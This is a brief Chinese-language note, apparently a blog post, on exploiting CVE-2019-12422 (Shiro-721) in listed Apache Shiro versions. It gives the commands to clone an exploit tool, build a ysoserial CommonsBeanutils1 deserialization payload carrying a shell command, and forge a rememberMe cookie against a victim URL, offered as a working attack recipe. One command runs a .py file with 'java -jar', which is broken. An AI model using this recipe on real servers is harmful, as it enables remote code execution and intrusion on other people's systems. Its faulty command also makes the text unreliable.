【笔记】CVE-2019-12422漏洞利用
前言
通过frohoff/ysoserial和inspiringz/Shiro-721实现Shiro-721漏洞利用
漏洞利用前提
- Shiro 1.2.5
- Shiro 1.2.6
- Shiro 1.3.0
- Shiro 1.3.1
- Shiro 1.3.2
- Shiro 1.4.0-RC2
- Shiro 1.4.0
- Shiro 1.4.1
下载项目
1 | git clone https://github.com/inspiringz/Shiro-721.git |
利用ysoserial生成payload
1 | java -jar ysoserial-all.jar CommonsBeanutils1 "<shell>" > x.class |
根据旧Cookie生成新的Cookie
通过浏览器获取名为
rememberMe的Cookie值利用旧的Cookie,自动爆破密钥,并根据ysoserial生成payload,生成新的Cookie
此操作会持续多个小时发送请求,可能会对服务器造成影响
<url>:受害者URL<cookie_old>:旧的Cookie值x.class:ysoserial生成的payload
1 | java -jar shiro_exp.py <url> <cookie_old> x.class |
- 替换旧的Cookie为新的Cookie